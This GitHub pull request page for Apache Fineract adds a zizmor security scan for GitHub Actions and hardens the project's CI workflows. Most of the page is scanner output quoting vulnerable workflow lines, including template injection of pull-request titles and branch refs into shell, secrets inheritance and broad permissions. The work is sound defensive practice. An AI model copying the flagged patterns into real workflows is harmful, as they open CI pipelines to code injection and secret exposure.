Skip to content

FINERACT-2421: Refactor and secure GitHub Actions workflows#5890

Merged
Aman-Mittal merged 1 commit into
apache:developfrom
Aman-Mittal:FINERACT-2421/zizmor-check
Jun 3, 2026
Merged

FINERACT-2421: Refactor and secure GitHub Actions workflows#5890
Aman-Mittal merged 1 commit into
apache:developfrom
Aman-Mittal:FINERACT-2421/zizmor-check

Conversation

@Aman-Mittal
Copy link
Copy Markdown
Member

@Aman-Mittal Aman-Mittal commented May 26, 2026
edited
Loading

  • Added a new GitHub workflow (.github/workflows/zizmor.yml) to automatically scan workflow files for security vulnerabilities using zizmor.
  • Configured the scan to trigger on pushes to any branch and pull requests to develop whenever files in .github/workflows/** are modified.
  • Configured the zizmor action with pinned SHAs for security, enforcing a minimum severity and confidence level of medium, and disabling online audits.

Description

Describe the changes made and why they were made. (Ignore if these details are present on the associated Apache Fineract JIRA ticket.)

Checklist

Please make sure these boxes are checked before submitting your pull request - thanks!

  • Write the commit message as per our guidelines
  • Acknowledge that we will not review PRs that are not passing the build ("green") - it is your responsibility to get a proposed PR to pass the build, not primarily the project's maintainers.
  • Create/update unit or integration tests for verifying the changes made.
  • Follow our coding conventions.
  • Add required Swagger annotation and update API documentation at fineract-provider/src/main/resources/static/legacy-docs/apiLive.htm with details of any API changes
  • This PR must not be a "code dump". Large changes can be made in a branch, with assistance. Ask for help on the developer mailing list.

Your assigned reviewer(s) will follow our guidelines for code reviews.

@Aman-Mittal
Copy link
Copy Markdown
Member Author

Aman-Mittal commented May 26, 2026

seems like need to fix security flaws raised by zizmor

warning[dependabot-cooldown]: insufficient cooldown in Dependabot updates
--> ./.github/dependabot.yml:6:5
|
6 | - package-ecosystem: "github-actions"
| ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ missing cooldown configuration
|
= note: audit confidence → High
= note: this finding has an auto-fix
= help: audit documentation → https://docs.zizmor.sh/audits/#dependabot-cooldown

warning[dependabot-cooldown]: insufficient cooldown in Dependabot updates
--> ./.github/dependabot.yml:13:5
|
13 | - package-ecosystem: "docker"
| ^^^^^^^^^^^^^^^^^^^^^^^^^^^ missing cooldown configuration
|
= note: audit confidence → High
= note: this finding has an auto-fix
= help: audit documentation → https://docs.zizmor.sh/audits/#dependabot-cooldown

error[excessive-permissions]: overly broad permissions
--> ./.github/workflows/full-build-ci.yml:7:3
|
7 | pull-requests: write
| ^^^^^^^^^^^^^^^^^^^^ pull-requests: write is overly broad at the workflow level
|
= note: audit confidence → High
= help: audit documentation → https://docs.zizmor.sh/audits/#excessive-permissions

warning[secrets-inherit]: secrets unconditionally inherited by called workflow
--> ./.github/workflows/full-build-ci.yml:11:11
|
11 | uses: ./.github/workflows/build-core.yml
| ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ this reusable workflow
12 | secrets: inherit
| ---------------- inherits all parent secrets
|
= note: audit confidence → High
= help: audit documentation → https://docs.zizmor.sh/audits/#secrets-inherit

warning[secrets-inherit]: secrets unconditionally inherited by called workflow
--> ./.github/workflows/full-build-ci.yml:16:11
|
16 | uses: ./.github/workflows/build-progressive-loan.yml
| ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ this reusable workflow
17 | secrets: inherit
| ---------------- inherits all parent secrets
|
= note: audit confidence → High
= help: audit documentation → https://docs.zizmor.sh/audits/#secrets-inherit

warning[secrets-inherit]: secrets unconditionally inherited by called workflow
--> ./.github/workflows/full-build-ci.yml:21:11
|
21 | uses: ./.github/workflows/build-docker.yml
| ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ this reusable workflow
22 | secrets: inherit
| ---------------- inherits all parent secrets
|
= note: audit confidence → High
= help: audit documentation → https://docs.zizmor.sh/audits/#secrets-inherit

warning[secrets-inherit]: secrets unconditionally inherited by called workflow
--> ./.github/workflows/full-build-ci.yml:26:11
|
26 | uses: ./.github/workflows/build-documentation.yml
| ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ this reusable workflow
27 | secrets: inherit
| ---------------- inherits all parent secrets
|
= note: audit confidence → High
= help: audit documentation → https://docs.zizmor.sh/audits/#secrets-inherit

warning[secrets-inherit]: secrets unconditionally inherited by called workflow
--> ./.github/workflows/full-build-ci.yml:31:11
|
31 | uses: ./.github/workflows/build-quality-checks.yml
| ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ this reusable workflow
32 | secrets: inherit
| ---------------- inherits all parent secrets
|
= note: audit confidence → High
= help: audit documentation → https://docs.zizmor.sh/audits/#secrets-inherit

warning[secrets-inherit]: secrets unconditionally inherited by called workflow
--> ./.github/workflows/full-build-ci.yml:36:11
|
36 | uses: ./.github/workflows/build-cucumber.yml
| ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ this reusable workflow
37 | secrets: inherit
| ---------------- inherits all parent secrets
|
= note: audit confidence → High
= help: audit documentation → https://docs.zizmor.sh/audits/#secrets-inherit

warning[secrets-inherit]: secrets unconditionally inherited by called workflow
--> ./.github/workflows/full-build-ci.yml:41:11
|
41 | uses: ./.github/workflows/build-postgresql.yml
| ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ this reusable workflow
42 | secrets: inherit
| ---------------- inherits all parent secrets
|
= note: audit confidence → High
= help: audit documentation → https://docs.zizmor.sh/audits/#secrets-inherit

warning[secrets-inherit]: secrets unconditionally inherited by called workflow
--> ./.github/workflows/full-build-ci.yml:46:11
|
46 | uses: ./.github/workflows/build-mysql.yml
| ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ this reusable workflow
47 | secrets: inherit
| ---------------- inherits all parent secrets
|
= note: audit confidence → High
= help: audit documentation → https://docs.zizmor.sh/audits/#secrets-inherit

warning[secrets-inherit]: secrets unconditionally inherited by called workflow
--> ./.github/workflows/full-build-ci.yml:51:11
|
51 | uses: ./.github/workflows/build-mariadb.yml
| ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ this reusable workflow
52 | secrets: inherit
| ---------------- inherits all parent secrets
|
= note: audit confidence → High
= help: audit documentation → https://docs.zizmor.sh/audits/#secrets-inherit

warning[secrets-inherit]: secrets unconditionally inherited by called workflow
--> ./.github/workflows/full-build-ci.yml:56:11
|
56 | uses: ./.github/workflows/build-e2e-tests.yml
| ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ this reusable workflow
57 | secrets: inherit
| ---------------- inherits all parent secrets
|
= note: audit confidence → High
= help: audit documentation → https://docs.zizmor.sh/audits/#secrets-inherit

warning[secrets-inherit]: secrets unconditionally inherited by called workflow
--> ./.github/workflows/full-build-ci.yml:61:11
|
61 | uses: ./.github/workflows/liquibase-only-postgresql.yml
| ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ this reusable workflow
62 | secrets: inherit
| ---------------- inherits all parent secrets
|
= note: audit confidence → High
= help: audit documentation → https://docs.zizmor.sh/audits/#secrets-inherit

warning[secrets-inherit]: secrets unconditionally inherited by called workflow
--> ./.github/workflows/full-build-ci.yml:66:11
|
66 | uses: ./.github/workflows/smoke-messaging.yml
| ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ this reusable workflow
67 | secrets: inherit
| ---------------- inherits all parent secrets
|
= note: audit confidence → High
= help: audit documentation → https://docs.zizmor.sh/audits/#secrets-inherit

warning[secrets-inherit]: secrets unconditionally inherited by called workflow
--> ./.github/workflows/full-build-ci.yml:71:11
|
71 | uses: ./.github/workflows/verify-api-backward-compatibility.yml
| ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ this reusable workflow
72 | secrets: inherit
| ---------------- inherits all parent secrets
|
= note: audit confidence → High
= help: audit documentation → https://docs.zizmor.sh/audits/#secrets-inherit

warning[secrets-inherit]: secrets unconditionally inherited by called workflow
--> ./.github/workflows/full-build-ci.yml:76:11
|
76 | uses: ./.github/workflows/verify-liquibase-backward-compatibility.yml
| ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ this reusable workflow
77 | secrets: inherit
| ---------------- inherits all parent secrets
|
= note: audit confidence → High
= help: audit documentation → https://docs.zizmor.sh/audits/#secrets-inherit

warning[secrets-inherit]: secrets unconditionally inherited by called workflow
--> ./.github/workflows/full-build-ci.yml:81:11
|
81 | uses: ./.github/workflows/verify-liquibase-ddl-safety.yml
| ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ this reusable workflow
82 | secrets: inherit
| ---------------- inherits all parent secrets
|
= note: audit confidence → High
= help: audit documentation → https://docs.zizmor.sh/audits/#secrets-inherit

warning[secrets-inherit]: secrets unconditionally inherited by called workflow
--> ./.github/workflows/full-build-ci.yml:86:11
|
86 | uses: ./.github/workflows/regression-safety-db-changes.yml
| ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ this reusable workflow
87 | secrets: inherit
| ---------------- inherits all parent secrets
|
= note: audit confidence → High
= help: audit documentation → https://docs.zizmor.sh/audits/#secrets-inherit

warning[secrets-inherit]: secrets unconditionally inherited by called workflow
--> ./.github/workflows/full-build-ci.yml:91:11
|
91 | uses: ./.github/workflows/sonarqube.yml
| ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ this reusable workflow
92 | secrets: inherit
| ---------------- inherits all parent secrets
|
= note: audit confidence → High
= help: audit documentation → https://docs.zizmor.sh/audits/#secrets-inherit

warning[secrets-inherit]: secrets unconditionally inherited by called workflow
--> ./.github/workflows/full-build-ci.yml:96:11
|
96 | uses: ./.github/workflows/run-integration-test-sequentially-postgresql.yml
| ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ this reusable workflow
97 | secrets: inherit
| ---------------- inherits all parent secrets
|
= note: audit confidence → High
= help: audit documentation → https://docs.zizmor.sh/audits/#secrets-inherit

warning[secrets-inherit]: secrets unconditionally inherited by called workflow
--> ./.github/workflows/full-build-ci.yml:101:11
|
101 | uses: ./.github/workflows/publish-dockerhub.yml
| ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ this reusable workflow
102 | secrets: inherit
| ---------------- inherits all parent secrets
|
= note: audit confidence → High
= help: audit documentation → https://docs.zizmor.sh/audits/#secrets-inherit

error[template-injection]: code injection via template expansion
--> ./.github/workflows/pr-title-check.yml:18:22
|
17 | run: |
| --- this run block
18 | title="${{ github.event.pull_request.title }}"
| ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ may expand into attacker-controllable code
|
= note: audit confidence → High
= note: this finding has an auto-fix
= help: audit documentation → https://docs.zizmor.sh/audits/#template-injection

error[template-injection]: code injection via template expansion
--> ./.github/workflows/publish-dockerhub.yml:40:20
|
39 | run: |
| --- this run block
40 | TAGS=${{ github.ref_name }}
| ^^^^^^^^^^^^^^^ may expand into attacker-controllable code
|
= note: audit confidence → High
= note: this finding has an auto-fix
= help: audit documentation → https://docs.zizmor.sh/audits/#template-injection

error[template-injection]: code injection via template expansion
--> ./.github/workflows/regression-safety-db-changes.yml:34:33
|
27 | run: |
| --- this run block
...
34 | git fetch origin "${{ github.event.pull_request.base.ref }}" --no-tags
| ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ may expand into attacker-controllable code
|
= note: audit confidence → High
= note: this finding has an auto-fix
= help: audit documentation → https://docs.zizmor.sh/audits/#template-injection

error[template-injection]: code injection via template expansion
--> ./.github/workflows/regression-safety-db-changes.yml:35:51
|
27 | run: |
| --- this run block
...
35 | MERGE_BASE=$(git merge-base "origin/${{ github.event.pull_request.base.ref }}" HEAD)
| ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ may expand into attacker-controllable code
|
= note: audit confidence → High
= note: this finding has an auto-fix
= help: audit documentation → https://docs.zizmor.sh/audits/#template-injection

error[template-injection]: code injection via template expansion
--> ./.github/workflows/verify-api-backward-compatibility.yml:42:45
|
38 | run: |
| --- this run block
...
42 | git fetch "https://github.com/${{ github.event.pull_request.head.repo.full_name }}.git"
| ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ may expand into attacker-controllable code
|
= note: audit confidence → High
= note: this finding has an auto-fix
= help: audit documentation → https://docs.zizmor.sh/audits/#template-injection

error[template-injection]: code injection via template expansion
--> ./.github/workflows/verify-api-backward-compatibility.yml:43:18
|
38 | run: |
| --- this run block
...
43 | "${{ github.event.pull_request.head.ref }}:refs/remotes/pr-head" --no-tags
| ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ may expand into attacker-controllable code
|
= note: audit confidence → High
= note: this finding has an auto-fix
= help: audit documentation → https://docs.zizmor.sh/audits/#template-injection

error[template-injection]: code injection via template expansion
--> ./.github/workflows/verify-commits.yml:39:35
|
39 | run: git fetch origin ${{ github.base_ref }}
| --- this run block ^^^^^^^^^^^^^^^ may expand into attacker-controllable code
|
= note: audit confidence → High
= note: this finding has an auto-fix
= help: audit documentation → https://docs.zizmor.sh/audits/#template-injection

error[template-injection]: code injection via template expansion
--> ./.github/workflows/verify-commits.yml:45:35
|
42 | run: |
| --- this run block
...
45 | --base-ref origin/${{ github.base_ref }}
| ^^^^^^^^^^^^^^^ may expand into attacker-controllable code
|
= note: audit confidence → High
= note: this finding has an auto-fix
= help: audit documentation → https://docs.zizmor.sh/audits/#template-injection

error[template-injection]: code injection via template expansion
--> ./.github/workflows/verify-liquibase-backward-compatibility.yml:74:38
|
73 | run: |
| --- this run block
74 | echo "Base branch ref: ${{ github.event.pull_request.base.ref }}"
| ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ may expand into attacker-controllable code
|
= note: audit confidence → High
= note: this finding has an auto-fix
= help: audit documentation → https://docs.zizmor.sh/audits/#template-injection

error[template-injection]: code injection via template expansion
--> ./.github/workflows/verify-liquibase-ddl-safety.yml:27:36
|
27 | run: git fetch origin "${{ github.event.pull_request.base.ref }}" --no-tags
| --- this run block ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ may expand into attacker-controllable code
|
= note: audit confidence → High
= note: this finding has an auto-fix
= help: audit documentation → https://docs.zizmor.sh/audits/#template-injection

error[template-injection]: code injection via template expansion
--> ./.github/workflows/verify-liquibase-ddl-safety.yml:32:51
|
31 | run: |
| --- this run block
32 | MERGE_BASE=$(git merge-base "origin/${{ github.event.pull_request.base.ref }}" HEAD)
| ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ may expand into attacker-controllable code
|
= note: audit confidence → High
= note: this finding has an auto-fix
= help: audit documentation → https://docs.zizmor.sh/audits/#template-injection

error[template-injection]: code injection via template expansion
--> ./.github/workflows/verify-liquibase-ddl-safety.yml:63:35
|
60 | run: |
| --- this run block
...
63 | --base-ref origin/${{ github.event.pull_request.base.ref }}
| ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ may expand into attacker-controllable code
|
= note: audit confidence → High
= note: this finding has an auto-fix
= help: audit documentation → https://docs.zizmor.sh/audits/#template-injection

149 findings (18 ignored, 97 suppressed, 14 fixable): 0 informational, 0 low, 21 medium, 13 high
Error: Process completed with exit code 14.

Aman-Mittal
Aman-Mittal commented May 26, 2026
View reviewed changes
Comment thread .github/workflows/full-build-ci.yml Outdated
adamsaghy
adamsaghy reviewed May 26, 2026
View reviewed changes
Comment thread .github/workflows/build-core.yml Outdated
adamsaghy
adamsaghy reviewed May 26, 2026
View reviewed changes
Comment thread .github/workflows/build-core.yml
@Aman-Mittal Aman-Mittal force-pushed the FINERACT-2421/zizmor-check branch from 3d8b044 to d6fb43f Compare May 27, 2026 14:41
@Aman-Mittal Aman-Mittal marked this pull request as ready for review May 27, 2026 15:42
@Aman-Mittal
Copy link
Copy Markdown
Member Author

Aman-Mittal commented May 27, 2026

@adamsaghy Ready for review can you review it again

@Aman-Mittal Aman-Mittal changed the title FINERACT-2421: Add zizmor GitHub Actions security analysis workflow FINERACT-2421: Refactor and secure GitHub Actions workflows May 27, 2026
@Aman-Mittal Aman-Mittal requested a review from adamsaghy May 27, 2026 15:47
@Aman-Mittal Aman-Mittal force-pushed the FINERACT-2421/zizmor-check branch 2 times, most recently from 619b8a6 to 4c728cc Compare June 1, 2026 15:58
@Aman-Mittal
FINERACT-2421: Refactor and secure GitHub Actions workflows
049e1b8 
refactored reusable workflow configuration for GitHub Actions
removed direct push triggers from reusable workflows and standardized workflow_call usage
added and adjusted concurrency handling for CI workflows to manage redundant runs
hardened workflow security by replacing inline GitHub context interpolation with environment variables in shell scripts
added explicit secret declarations and removed secrets: inherit usage
added persist-credentials: false to checkout steps across workflows
updated workflow permissions and zizmor security analysis configuration
added zizmor GitHub Actions security scanning workflow and related ignore rules
fixed malformed workflow syntax and cleaned duplicate configuration lines
updated Dependabot cooldown configuration for Maven and Docker updates
@Aman-Mittal Aman-Mittal force-pushed the FINERACT-2421/zizmor-check branch from f0e6e69 to 049e1b8 Compare June 1, 2026 16:23
adamsaghy
adamsaghy approved these changes Jun 3, 2026
View reviewed changes
Copy link
Copy Markdown
Contributor

@adamsaghy adamsaghy left a comment

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

LGTM

@adamsaghy
Copy link
Copy Markdown
Contributor

adamsaghy commented Jun 3, 2026

@Aman-Mittal You can merge if you believe it is ready! ;)

@Aman-Mittal Aman-Mittal merged commit 5b79dda into apache:develop Jun 3, 2026
176 of 177 checks passed
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment

Reviewers

@adamsaghy adamsaghy adamsaghy approved these changes

Assignees

No one assigned

Labels

None yet

Projects

None yet

Milestone

No milestone

Development

Successfully merging this pull request may close these issues.

2 participants

@Aman-Mittal @adamsaghy